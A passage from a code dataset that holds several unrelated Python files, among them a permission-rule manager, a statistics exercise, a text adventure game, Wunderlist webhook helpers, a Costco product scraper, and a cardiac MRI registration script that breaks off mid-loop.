Rule.get_by_(resource, scope, operation)\n if not rule:\n rule = Rule(name=resource, operation=operation, scope=scope,\n description=description)\n rule.save()\n log.debug(f\"New auth rule '{resource}' with scope={scope}\"\n f\" and operation={operation} is stored in the DB\")\n\n if assign_to_container:\n self.assign_rule_to_container(resource, scope, operation)\n\n if assign_to_node:\n self.assign_rule_to_node(resource, scope, operation)\n\n # assign all new rules to root user\n self.assign_rule_to_root(resource, scope, operation)\n\n self.collection(resource).add(rule.scope, rule.operation)\n\n def appender(self, name: str) -> callable:\n \"\"\"\n Add a module's rules to the rule collection\n\n Parameters\n ----------\n name: str\n The name of the module whose rules are to be registered\n\n Returns\n -------\n Callable\n A callable ``register_rule`` function\n \"\"\"\n # make sure collection exists\n self.collection(name)\n return lambda *args, **kwargs: self.register_rule(name, *args,\n **kwargs)\n\n def collection(self, name: str) -> RuleCollection:\n \"\"\"\n Get a RuleCollection object. If it doesn't exist yet, it will be\n created.\n\n Parameters\n ----------\n name: str\n Name of the module whose RuleCollection is to be obtained or\n created\n\n Returns\n -------\n RuleCollection\n The collection of rules belonging to the module name\n \"\"\"\n if self._collection_exists(name):\n return self.collections[name]\n else:\n self.collections[name] = RuleCollection(name)\n return self.collections[name]\n\n def _collection_exists(self, name: str) -> bool:\n \"\"\"\n Check if a module's rule collection is defined\n\n Parameters\n ----------\n name: str\n Name of the module to be checked\n\n Returns\n -------\n bool:\n True if RuleCollection is defined for module, else False\n \"\"\"\n return name in self.collections\n\n def __getattr__(self, name: str) -> RuleCollection:\n # TODO BvB 2023-01-18 I think this function might not be used. It would\n # be triggered when we do something like\n # `permissionManager.resource_name` but we don't ever do that (?!)\n try:\n collection = self.collections[name]\n return collection\n except Exception as e:\n log.critical(f\"Missing permission collection! {name}\")\n raise e\n\n @staticmethod\n def rule_exists_in_db(name: str, scope: Scope,\n operation: Operation) -> bool:\n \"\"\"Check if the rule exists in the DB.\n\n Parameters\n ----------\n name: str\n Name of the rule\n scope: Scope\n Scope of the rule\n operation: Operation\n Operation of the rule\n\n Returns\n -------\n bool\n Whenever this rule exists in the database or not\n \"\"\"\n session = DatabaseSessionManager.get_session()\n result = session.query(Rule).filter_by(\n name=name,\n operation=operation,\n scope=scope\n ).scalar()\n session.commit()\n return result\n\n @staticmethod\n def check_user_rules(rules: list[Rule]) -> dict | bool:\n \"\"\"\n Check if a user, node or container has all the `rules` in a list\n\n Parameters\n ----------\n rules: List[Rule]\n List of rules that user is checked to have\n\n Returns\n -------\n dict | bool\n Dict with a message which rule is missing, else None\n \"\"\"\n for rule in rules:\n requires = RuleNeed(rule.name, rule.scope, rule.operation)\n try:\n Permission(requires).test()\n except PermissionDenied:\n return {\"msg\": f\"You don't have the rule ({rule.name}, \"\n f\"{rule.scope}, {rule.operation})\"}\n return None\n","sub_path":"vantage6-server/vantage6/server/permission.py","file_name":"permission.py","file_ext":"py","file_size_in_byte":10436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"365102370","text":"from functions import lamda_exponential_estimate, d_sample_exponential\nfrom functions import p_value_exponential, reject, p_value\n\n\nif __name__ == '__main__':\n \"\"\"\n Enunciado: En un estudio de vibraciones, una muestra aleatoria de 15\n componentes de un avión fueron sometidos a fuertes vibraciones, hasta que\n se evidenciaron fallas estructurales. Los datos proporcionados son los\n minutos transcurridos hasta que se evidenciaron dichas fallas, 1.6 10.3 3.5\n 13.5 18.4 7.7 24.3 10.7 8.4 4.9 7.9 12 16.2 6.8 14.7.\n Pruebe la hipótesis nula de que estas observaciones pueden ser consideradas\n como una muestra de la población exponencial.\n \"\"\"\n H0 = \"H0: Los siguientes datos corresponden a una distribución exponencial\"\n text = \"P-valor con Kolmogorov-Smirnov:\"\n\n sample = [1.6, 10.3, 3.5, 13.5, 18.4, 7.7, 24.3, 10.7, 8.4, 4.9, 7.9, 12,\n 16.2, 6.8, 14.7]\n sample.sort()\n\n n, Iter = len(sample), 10000\n lamda = lamda_exponential_estimate(sample)\n d = d_sample_exponential(sample, lamda)\n p_value_1 = p_value_exponential(n, lamda, d, Iter)\n p_value_2 = p_value(n, Iter, d)\n\n print(\"Estadístico: {}\".format(d))\n print(\"===============================\")\n print(\"{}\\n{}\".format(H0, text))\n print(\"Estimando parámetros en cada iteración: {}\".format(p_value_1))\n reject(p_value_1)\n print(\"===============================\")\n print(\"Sin estimar parámetros: {}\".format(p_value_2))\n reject(p_value_2)\n","sub_path":"ModelosySimulacion/modysim-master/practical7/exerc7.py","file_name":"exerc7.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"87071350","text":"from src.vision.presentation.repositories.depthImagePointsRepository import depthImagePointsRepository\n\n\nclass Transform3DPointsToDepthFileService:\n def __init__(self):\n self.depthImageRepository = depthImagePointsRepository()\n\n def execute(self, points_3d, points_a_2d, calibration_data, image):\n self.depthImageRepository.saveInPathWithImage(\n 'bin/second_test.txt',\n points_3d,\n points_a_2d,\n (image.shape[0], image.shape[1])\n )\n\n self.depthImageRepository.readFromPath('bin/second_test.txt')\n","sub_path":"code/src/vision/presentation/services/Transform3DPointsToDepthFileService.py","file_name":"Transform3DPointsToDepthFileService.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"337593556","text":"from room import Room\nfrom player import Player\nfrom item import Gold\nfrom item import Food\n\n# Declare all the rooms\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"North of you, the cave mount beckons\"),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\", [Food('banana', 'is a bit bruised', 20), Gold(100)]),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. The only exit is to the south.\"\"\"),\n}\n\n\n# Link rooms together\nroom['outside'].north_to = room['foyer']\nroom['outside'].n_to = room['foyer']\nroom['foyer'].south_to = room['outside']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].north_to = room['overlook']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].east_to = room['narrow']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].south_to = room['foyer']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].west_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].north_to = room['treasure']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].south_to = room['narrow']\nroom['treasure'].s_to = room['narrow']\n\n#\n# Main\n#\n\n\ndef tryDirection(d, curRoom):\n\n attrib = d + '_to'\n\n # curRoom.s_to\n # hasattr(currRoom, 's_to) will return true\n if hasattr(curRoom, attrib):\n return getattr(curRoom, attrib)\n else:\n print(\"You cant go that way\")\n\n return curRoom\n\n\n# Make a new player object that is currently in the 'outside' room.\nplayer = Player(room['outside'])\n# Write a loop that:\n#\n# * Prints the current room name\n# * Prints the current description (the textwrap module might be useful here).\n# * Waits for user input and decides what to do.\n#\n# If the user enters a cardinal direction, attempt to move to the room there.\n# Print an error message if the movement isn't allowed.\n#\n# If the user enters \"q\", quit the game.\n\ndone = False\n\nwhile not done:\n print('\\nWelcome to my adventure game! In this game you will choose which direction you want to go from room to room. In the terminal please type either n or north, s or south, w or west, or e or east. To exit type q or quit. Thank you!')\n print(f'\\n{player.curRoom.name}\\n')\n print(f'{player.curRoom.description}')\n\n # print room items\n for item in player.curRoom.items:\n print(item)\n print(item.inspect())\n\n user_input = input(\"\\nType direction to go: \").strip().lower().split()\n\n if len(user_input) != 1:\n print('I dont understand that. Type n,s,w, or e')\n continue\n\n if user_input[0] == 'quit' or user_input[0] == 'q':\n done = True\n\n elif user_input[0] in [\"n\", \"north\", \"s\", \"south\", \"w\", \"west\", \"e\", \"east\"]:\n player.curRoom = tryDirection(user_input[0], player.curRoom)\n\n else:\n unknown_input = user_input[0]\n print('Unknown command: ', unknown_input)\n","sub_path":"src/adv.py","file_name":"adv.py","file_ext":"py","file_size_in_byte":3307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"584421828","text":"'''\nEncapsulates all tasks that can be run against the 'webhooks' endpoint\n'''\ndef _check_url_length(url, api):\n ''' Checks the given url against the given API specifications to ensure it's short enough '''\n if len(url) > api.MAX_WEBHOOK_URL_LENGTH:\n raise ValueError(\"Url cannot be longer than {} characters\".format(api.MAX_WEBHOOK_URL_LENGTH))\n\ndef get_webhooks(client, list_id):\n ''' Gets all webhooks for the given list ID '''\n params = { \n 'list_id' : str(list_id)\n }\n response = client.authenticated_request(client.api.Endpoints.WEBHOOKS, params=params)\n return response.json()\n\ndef create_webhook(client, list_id, url, processor_type, configuration=\"\"):\n ''' \n Creates a webhook in the given list\n\n See https://developer.wunderlist.com/documentation/endpoints/webhooks for detailed parameter information\n '''\n _check_url_length(url, client.api)\n data = {\n 'list_id' : int(list_id) if list_id else None,\n 'url' : url,\n 'processor_type' : processor_type,\n 'configuration' : configuration\n }\n data = { key: value for key, value in data.iteritems() if value is not None }\n response = client.authenticated_request(client.api.Endpoints.WEBHOOKS, 'POST', data=data)\n return response.json()\n\ndef delete_webhook(client, webhook_id, revision):\n params = {\n 'revision' : int(revision),\n }\n endpoint = '/'.join([client.api.Endpoints.WEBHOOKS, str(webhook_id)])\n client.authenticated_request(endpoint, 'DELETE', params=params)\n","sub_path":"wunderpy2/webhooks_endpoint.py","file_name":"webhooks_endpoint.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"141415926","text":"class Solution:\n # @param A : string\n # @return an integer\n def lengthOfLastWord(self, A):\n A = A.split(' ')\n A = A[::-1]\n for i in A:\n if i.isalpha():\n return len(i)\n return 0\n\n\nrr = Solution()\nr = rr.lengthOfLastWord('Hello World')\nprint(r)\n","sub_path":"Strings/length-of-last-word.py","file_name":"length-of-last-word.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"388265410","text":"import time\nimport multiprocessing\n\n\ndef worker(data):\n [calc(x) for x in data]\n\n\ndef calc(x):\n a = x * 2\n print(a)\n #time.sleep(2)\n\nif __name__ == '__main__':\n split_data = [[1, 2, 3], [4, 5]]\n\n jobs = []\n for data in split_data:\n job = multiprocessing.Process(target=worker, args=(data, ))\n jobs.append(job)\n job.start()\n\n [job.join() for job in jobs]\n\n print('Finish')\n","sub_path":"japan_stock_analysis/python_stock/multiprocess_test.py","file_name":"multiprocess_test.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"554678840","text":"import json\n\nimport torch\nfrom torchvision.utils import make_grid\nimport matplotlib.pyplot as plt\n\nfrom datasets import get_CIFAR10, get_SVHN, postprocess\nfrom model import Glow\n\nimport glob\nimport train\n\ndevice = torch.device(\"cpu\")\n\noutput_folder = 'output/'\nlatest_model_path = glob.glob(\"output/glow_model_*.pth\")[-1]\n\nwith open(output_folder + 'hparams.json') as json_file: \n hparams = json.load(json_file)\n\ntest_mnist = train.MyMNIST(train=False, download=False)\nimage_shape = (32, 32, 1)\nnum_classes = 10\nbatch_size = 512\n\nmodel = Glow(image_shape, hparams['hidden_channels'], hparams['K'], hparams['L'], hparams['actnorm_scale'],\n hparams['flow_permutation'], hparams['flow_coupling'], hparams['LU_decomposed'], num_classes,\n hparams['learn_top'], hparams['y_condition'])\n\nmodel.load_state_dict(torch.load(latest_model_path))\nmodel.set_actnorm_init()\n\nmodel = model.to(device)\n\nmodel = model.eval()\n\ndef sample(model):\n with torch.no_grad():\n if hparams['y_condition']:\n y = torch.eye(num_classes)\n y = y.repeat(batch_size // num_classes + 1)\n y = y[:32, :].to(device) # number hardcoded in model for now\n else:\n y = None\n\n images = postprocess(model(y_onehot=y, temperature=1, reverse=True))\n\n return images.cpu()\n\nimages = sample(model)\ngrid = make_grid(images[:30], nrow=6).permute(1,2,0)\n\nplt.figure(figsize=(10,10))\nplt.imshow(grid)\nplt.axis('off')\nplt.savefig('output.png')\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"593980649","text":"import config\n\nimport BStockImages.util.db.dbmongo as dbm\nfrom BStockImages.util.images import *\n\nimport requests as rq\nimport re \nfrom random import shuffle\n\nfrom html.parser import HTMLParser\n\nfrom pprint import *\n\nimport json\nimport os\n\nimport PIL as pil\nimport PIL.Image as image\n\n_CLOTHING_REGEX = re.compile('var products = (\\[.*?\\]);\\r', re.DOTALL)\n\nclass CostcoParser(HTMLParser):\n def __init__(self):\n super().__init__()\n self.found = False\n self.itemnum = -1\n self.description = \"\"\n self.pictureurl = \"\"\n\n def handle_data(self, data):\n if self.description == '-1':\n self.description = data\n\n def handle_starttag(self, tag, attrs):\n if tag == 'h1' and ('itemprop', 'name') in attrs:\n self.description = '-1'\n \n if self.found:\n return \n \n if tag == 'span' and self.itemnum == -1:\n for k,v in attrs:\n if 'data-sku' == k:\n print('Sku')\n self.itemnum = int(v)\n if self.pictureurl != \"\":\n self.found = True\n break\n if tag == 'img' and self.pictureurl == \"\":\n if ('id', 'initialProductImage') in attrs:\n for k, v in attrs:\n if k == 'src':\n self.pictureurl = v\n if self.itemnum != -1:\n self.found = True\n break\n\n\ndef _testClothing(request):\n result = _CLOTHING_REGEX.search(request.text)\n\n if result == None:\n return None\n\n jsn = json.loads(result.group(1))\n\n retv = []\n for item in jsn[0]:\n try:\n itemnumber = item['partNumber']\n description = item['productName']\n url = item['parent_img_url']\n\n retv.append((itemnumber, description, url))\n except KeyError as e:\n print(\"Error --- \", jsn)\n return retv\n \ndef searchCostco(itemnum):\n URL = 'https://www.costco.com/.product.html?dept=All&catalogId=0&keyword=%s'\n HEADER = { 'User-Agent' : 'Mozilla/5.0' }\n\n parse = CostcoParser()\n\n retv = None\n with rq.get(URL % itemnum, headers=HEADER) as req:\n if req.status_code == 200:\n parse.feed(req.text)\n if parse.found:\n retv = [(itemnum, parse.description, parse.pictureurl)]\n else:\n retv = _testClothing(req)\n return retv\n\nif __name__ == '__main__':\n # Setup DB\n client = dbm.getClient()\n db = client.Items\n col = db.costco\n\n #searchCostco(1168584)\n\n items = list(col.find({\n 'searched': True, \n 'found': False, \n 'reasons.website' : {\n '$exists' : False\n }\n }))\n shuffle(items)\n\n path = os.path.join(os.getenv('home'), 'Images')\n os.chdir(path)\n\n for i in range(10000):\n srcitm = items[i]\n print('Searching (%d) %d - ' % (i, srcitm['item-num']), end = '', flush=True)\n results = searchCostco(srcitm['item-num'])\n \n if results == None:\n continue\n multi = 0\n\n img = None\n for itn, des, url in results:\n print(itn, des, url, flush=True)\n dbitem = col.find_one({'item-num' : itn})\n if dbitem != None and dbitem['found']:\n continue\n\n if multi == 0:\n img = download_image(url)\n if img == None:\n print('Image does not exist', itn)\n break\n img.save(str(itn) + '.jpg')\n multi += 1\n else:\n img.save(str(itn) + '.jpg') \n \n reason = {\n 'success' : True,\n 'website' : True,\n 'description' : des,\n 'imglink' : url\n }\n if dbitem != None and dbitem['found'] != True:\n query = {'$set' : { 'found': True, \n 'searched' : True,\n 'image-name' : str(itn) + '.jpg',\n 'reasons' : reason }}\n col.update({'_id' : dbitem['_id']}, query)\n else:\n ins = {\n 'item-num' : itn,\n 'searched' : True,\n 'found' : True,\n 'description' : des,\n 'image-name' : str(itn) + '.jpg',\n 'reasons' : reason\n }\n col.insert(ins)\n","sub_path":"Costco/costcosearch.py","file_name":"costcosearch.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"124937837","text":"#Classes\n\n#A class is code that specifies the data attributes and methods for a particular type of object\nimport random\n#The coin Coin class simulates a coin that can be flipped\n\nclass Coin:\n #the __init__ method is present in every class and initializes the sideup data attribute with heads\n def __init__(self):\n self.__sideup = 'Heads'\n\n # The toss method generateds a random number\n # in the range 0-1. If the number\n # is 0, then sideup is set to heads, \n # otherwise, sideup is set to tails\n def toss(self):\n if random.randint(0, 1) == 0:\n self.__sideup = 'Heads'\n else:\n self.__sideup = 'Tails'\n\n # The get_sideup method returns the value\n # referenced by sideup\n def get_sideup(self):\n return self.__sideup \n\n# main function to operate with this class\ndef main():\n #Create an object from the coin class\n my_coin = Coin()\n type(my_coin)\n\n # sideup attribute is not private\n my_coin.__sideup = 'Tails'\n #If we don't want the user to set that variable \n # it needs to be private. Prepend the variable with __\n # It will not error, but it prevents the assignment\n\n #Display the side of the coin that is facing up\n print('This side is up: ', my_coin.get_sideup())\n\n #Toss the coin\n print('I am tossing the coin ....')\n for count in range(10):\n my_coin.toss()\n print(my_coin.get_sideup())\n\n\n #Display the side of the coin that is facing up\n print('This side is up: ', my_coin.get_sideup())\n\n\n#main()\n####\n#More Lecture notes","sub_path":"LABS/Classes/coin.py","file_name":"coin.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"338468571","text":"#! /usr/bin/env python3\n# coding: utf-8\n\n\"\"\"\nTheRightFood app Command Line Interface\nreleased under MIT License\nby Stephanie BLANCHET stephanie.blanchet.it@gmail.com\n\nPython 3.7 script\nfiles: explorer.py, finder.py, organizer.py, user.py, settings.py,\ntab_builder.py, db_builder.py, cat_updater.py, mysql_connect.py\n\"\"\"\n\n\nfrom modules.tab_builder import *\nfrom modules.organizer import *\n\n\ndef main():\n \"\"\"\n This module coordinates all other user-dependent modules.\n \"\"\"\n choose = Explorer()\n user = User()\n find = Finder(choose)\n sort = Organizer(find.codes, user)\n\n print(\"\"\"\n ---------------------------------\n Bienvenue sur votre application !\n ---------------------------------\n \"\"\")\n\n def restart():\n choice = input(\"\"\"\n __________\n\n 1 - Je souhaite effectuer une nouvelle recherche. \n 2 - Je souhaite voir mes aliments substitués.\n 3 - Je quitte l'application, merci !\n \n \"\"\")\n if choice == '1':\n choose.item.clear()\n find.codes.clear()\n select_cat()\n if choice == '2':\n if not user.info:\n user.case()\n sort.display_selection()\n restart()\n else:\n sort.display_selection()\n restart()\n if choice == '3':\n print('\\n\\t\\tA bientôt !')\n quit()\n else:\n print(alert_3)\n restart()\n\n def opt_favorite():\n if not find.results.empty:\n choice = input(\"\"\"\n __________\n \n Souhaitez-vous enregistrer un produit dans vos favoris ? (OUI = 1 / NON = 2)\n \n \"\"\")\n if choice == '1':\n if not user.info:\n user.case()\n sort.save_selection()\n restart()\n else:\n sort.save_selection()\n restart()\n if choice == '2':\n restart()\n else:\n print(alert_1)\n opt_favorite()\n else:\n select_scenario()\n\n def select_scenario():\n find.filter()\n opt_favorite()\n sort.save_selection()\n restart()\n\n def select_cat():\n choose.search_cat()\n check = 'SELECT COUNT(*) FROM product WHERE category = \"{}\"'.format(choose.item[0])\n cursor.execute(check)\n available_cat = cursor.fetchone()\n if available_cat[0] == 0:\n print(\"\"\"\n *** Cet aliment n'est pas encore dans notre base. ***\n Merci de patienter. Nous collectons les données nécessaires.\n \"\"\")\n collect = Builder(choose)\n collect.builder()\n select_scenario()\n else:\n select_scenario()\n\n def start():\n choice = input(\"\"\"\n Que souhaitez-vous faire ?\n\n 1 - Substituer un aliment\n 2 - Retrouver mes aliments substitués\n \n \"\"\")\n if choice == '1':\n select_cat()\n if choice == '2':\n user.log_in()\n sort.display_selection()\n restart()\n else:\n print(alert_1)\n start()\n\n start()\n\nif __name__ == '__main__':\n main()\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"437582337","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 8 13:33:43 2018\n\n@author: pourasgh\n\"\"\"\n\n\nimport nibabel\nfrom matplotlib import pyplot as plt\nimport os\nimport numpy as np\nfrom Config import *\nfrom STN import *\nimport tensorflow as tf\nfrom PIL import Image\nfrom scipy.spatial.distance import directed_hausdorff\n\n\nconfig = Config(is_train= True)\n\ndispm_dir = config.dispmDir\n\n\n\n\nfixed= True\nKorM=1\npaitent_num=2\ngt_frame =12\nfor slice_ in [config.sliceNum]:\n str3 =r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_'\n str4 =\"/lr_1E-05,lr_1E-05,bn=false,do=true,usefc,1,_,\"\n str4_1 =\"/lr_1E-05,lr_1E-05,bn=false,do=true,use_mr2,1,_,\"\n strdtat = r'/home/ameneh/UofA/Datasets/ACDC/Diagnosis/training/patient00'\n frame_1 =strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_frame01_gt.nii.gz' \n frame_12 = strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_frame' + str(gt_frame)+'_gt.nii.gz'\n dataFileDice = strdtat + str(paitent_num)+\"/patient00\" +str(paitent_num)+'_4d.nii.gz'\n\n\n \n image_mr = nibabel.load(dataFileDice)\n data_im = image_mr.get_data()\n cardiacnumofimages = data_im.shape[3]\n # Load MR data from file\n image_mr01 = nibabel.load(frame_1)\n data_im01 = image_mr01.get_data()\n #data_im01 = data_im01[:,:,5]\n image_mr12 = nibabel.load(frame_12)\n data_im12 = image_mr12.get_data()\n \n \n \n \n \n \n # Iterate through slices\n # for slice_ in range(4,5): \n \n \n \n # st=r\"/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_0000/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1,_,5,_,18500.npy\"\n for fdmname2 in ['/home/ameneh/UofA/git/NonRigidReg/MultiResolution/tmp/tmp_27_3/lr_1E-06,1,_,1,_,10000.npy']:#[str3 + str(paitent_num) + str(slice_)+str4+ str(slice_)+',_,12000.npy']:\n #str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,2000.npy',\n #str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,3000.npy']:\n #,str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,4000.npy'\n #,str3 + str(paitent_num) + str(slice_)+str4 + str(slice_)+',_,5000.npy']:# range(data_im.shape[2]): \n print(fdmname2)\n if not os.path.exists(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)):\n os.mkdir(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_))\n \n \n \n file = open(\"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+\"/test1file.txt\",\"a+\") \n SeriesInstanceUID = \"{}.{:04d}\".format(os.path.splitext(os.path.split(dataFileDice)[1])[0],slice_)\n fdmname = str(os.path.join(config.dispmDir, SeriesInstanceUID, \"DM-{:04d}.bin\".format(slice_*cardiacnumofimages)) ) \n #fdmname2 = r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp_fc_best/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1000.npy'\n #fdmname2= r'/home/ameneh/UofA/git/DIRegistration_Manifold/tmp/tmp_1/lr_1E-04,lr_1E-04,bn=false,do=true,usefc,1,_,1,_,3000.npy'#home/ameneh/UofA/git/DIRegistration_Manifold/tmp/lr_1E-06,lr_1E-06,bn=false,do=true,usefc,41000.npy'\n \n # check if there is a displacement matrix\n if os.path.isfile(fdmname2): \n \n DM_i = np.load(open(fdmname, 'rb')) \n DM_ = np.load(open(fdmname2, 'rb'))\n # DM_ =[]\n DM_fx, DM_fy, DM_bx, DM_by, bb = DM_i[\"DM_fx\"], DM_i[\"DM_fy\"], DM_i[\"DM_bx\"], DM_i[\"DM_by\"], DM_i[\"bb\"]\n print(DM_fx.shape)\n DM_fx = np.swapaxes(DM_fx, 1, 2)\n DM_fy = np.swapaxes(DM_fy, 1, 2)\n DM_fx = np.expand_dims(DM_fx , -1)\n DM_fy = np.expand_dims(DM_fy , -1)\n DM = np.concatenate((DM_fx, DM_fy),axis = 3)\n \n \n #print(\"DM \", disp.shape)\n rect = np.array(bb)\n rect = rect.astype('int')\n rect = np.round(rect)\n \n sess = tf.Session()\n image = data_im01[:,:,slice_]\n # image = image/255\n image = image.astype('float32')\n \n if fixed:\n def1 = 60 - (rect[1]-rect[0])\n def2 = 60- (rect[3]-rect[2])\n if (def1 % 2) == 0 :\n def1_1 = np.int(def1/2)\n def1_2 = np.int(def1/2)\n else:\n def1_1 =np.int((def1+1)/2)\n def1_2 = np.int((def1-1)/2)\n \n if (def2 % 2) == 0 :\n def2_1 = np.int(def2/2)\n def2_2 = np.int(def2/2)\n else:\n def2_1 = np.int((def2+1)/2)\n def2_2 = np.int((def2-1)/2)\n \n if fixed: \n im_warp = image[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n else:\n im_warp = image[rect[0]:rect[1], rect[2]:rect[3]]\n \n print(data_im.shape)\n \n# source_im = data_im[:, :,slice_,0]\n# print(source_im.shape)\n# source_im = source_im.astype('float32')\n# source_im = source_im[rect[0]:rect[1], rect[2]:rect[3]]\n# \n# \n# source_target = data_im[:,:,slice_,gt_frame]\n# source_target = source_target.astype('float32')\n# source_target = source_target[rect[0]:rect[1], rect[2]:rect[3]]\n \n image1 = data_im12[:,:,slice_]\n image1 = image1.astype('float32')\n if fixed:\n im_target = image1[rect[0]-def1_1:rect[1]+def1_2, rect[2]-def2_1:rect[3]+def2_2]\n else:\n im_target = image1[rect[0]:rect[1], rect[2]:rect[3]] \n im_target = np.squeeze(im_target)\n \n \n pixelMap = im_warp\n pixelMap2 = im_target\n print(im_warp.shape)\n im_mov= tf.placeholder(tf.float32, [1,im_warp.shape[0],im_warp.shape[1]])\n dispM = tf.placeholder(tf.float32, [1,im_warp.shape[0],im_warp.shape[1],2])\n #####################################################################\n \n for i in range(im_warp.shape[0]):\n for j in range(im_warp.shape[1]):\n #print(float(im_warp[i,j]))\n if float(im_warp[i,j]) <3:\n pixelMap[i,j] =255\n else:\n pixelMap[i,j] = 0\n # print(\"frame 0 \")\n # plt.imshow(pixelMap, cmap = 'gray')\n # plt.show()\n \n for i in range(im_target.shape[0]):\n for j in range(im_target.shape[1]):\n #print(float(im_warp[i,j]))\n if float(im_target[i,j]) <3:\n pixelMap2[i,j] =255\n else:\n pixelMap2[i,j] = 0\n \n # print(\"frame 12 \")\n # plt.imshow(pixelMap2, cmap = 'gray')\n # plt.show()\n # \n im_warp = pixelMap/255\n im_warp = np.expand_dims(im_warp, 0)\n# source_im = np.expand_dims(source_im,0)\n im_target = pixelMap2/255\n #im_target2 = np.expand_dims(im_target, 0)\n \n im = im_warp\n im3 =im_warp\n if KorM == 0:\n for i in range (gt_frame):\n disp=DM[i,:,:,:]\n source_im = data_im[:, :,slice_,i]\n disp = np.expand_dims(disp,0)\n im_warp2 =STN(im_mov, dispM)\n im=sess.run(im_warp2, {im_mov:im, dispM : disp})\n im2 = np.squeeze(im)\n \n \n \n \n \n \n plt.figure()\n plt.imshow(im2, 'gray', interpolation='none', alpha=0.6)\n plt.imshow(im_target, 'gray', interpolation='none', alpha=0.3)\n \n str2 = \"/home/ameneh/results_dl/\"+str(paitent_num)+str(slice_)+'/K' + '.png'\n \n plt.savefig(str2, bbox_inches='tight')\n \n \n plt.figure(2)\n plt.imshow(im_target, 'gray')\n plt.show()\n file.write( str(np.sum(im[im_target2==1])*2.0 / (np.sum(im)+ np.sum(im_target2)))+\"\\r\\n\")\n print( np.sum(im[im_target2>0])*2.0 / (np.sum(im)+ np.sum(im_target2)))\n #break\n # for i in range (12):\n # \n # print(i)\n # dispm=DM[i,:,:,:]\n # dispm = np.expand_dims(dispm,0)\n # im_warp3 =STN(im_mov, dispm)\n # im3=sess.run(im_warp3, {im_mov:im3, dispM : dispm})\n # im4 = np.squeeze(im3)\n # \n #plt.imshow(im2, cmap = 'gray' ) \n \n else:\n from skimage import measure\n# from scipy import interpolate\n from scipy import interpolate as itp\n import scipy.ndimage.morphology as ndimage\n\n\n\n dx = DM_[10,:,:,0]\n dy = DM_[10,:,:,1]\n scipy.io.savemat('dxam.mat', {'mydata': dx})\n scipy.io.savemat('dyam.mat', {'mydata': dy})\n \n \n\n for i in range (gt_frame):\n \n print(i)\n disp=DM_[i,:,:,:]\n #source image in orf=der to show countor on the main image\n \n dx = DM_[i,:,:,0]\n dy = DM_[i,:,:,1]\n strmatx =\"dxam\"+str(i)+\".mat\" \n strmaty =\"dyam\"+str(i)+\".mat\" \n scipy.io.savemat(strmatx, {'mydata': dx})\n scipy.io.savemat(strmaty, {'mydata': dy})\n \n #\n print(slice_, \"disp: \", disp.shape)\n disp = np.expand_dims(disp,0)\n im_warp2 =STN(im_mov, dispM)\n im=sess.run(im_warp2, {im_mov:im, dispM : disp})\n \n #source_im=sess.run(im_warp2, {im_mov:source_im, dispM : disp})\n im2 = np.squeeze(im)\n# im2 = ndimage.grey_dilation(im2, size=(4,6))\n# im2 = ndimage.grey_erosion(im2, size=(1,1))\n plt.imshow(im2, cmap=plt.cm.gray)\n plt.show()\n #find countor \n contours = measure.find_contours(im2,0.8)\n # Display the image and plot all contours found\n fig, ax = plt.subplots()\n \n\n# for n, contour in enumerate(contours):\n# ax.plot(contour[:, 1], contour[:, 0], linewidth=2)\n\n# 